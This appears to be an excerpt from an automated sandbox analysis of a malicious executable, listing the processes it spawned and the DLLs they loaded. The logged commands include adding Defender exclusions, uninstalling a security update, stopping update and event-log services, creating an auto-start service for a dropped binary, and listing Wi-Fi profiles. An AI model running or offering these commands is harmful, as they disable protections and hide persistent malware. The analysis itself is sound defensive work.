              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" Jump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUOIJWEW"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUOIJWEW"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\System.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\System.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\findstr.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: edgegdi.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
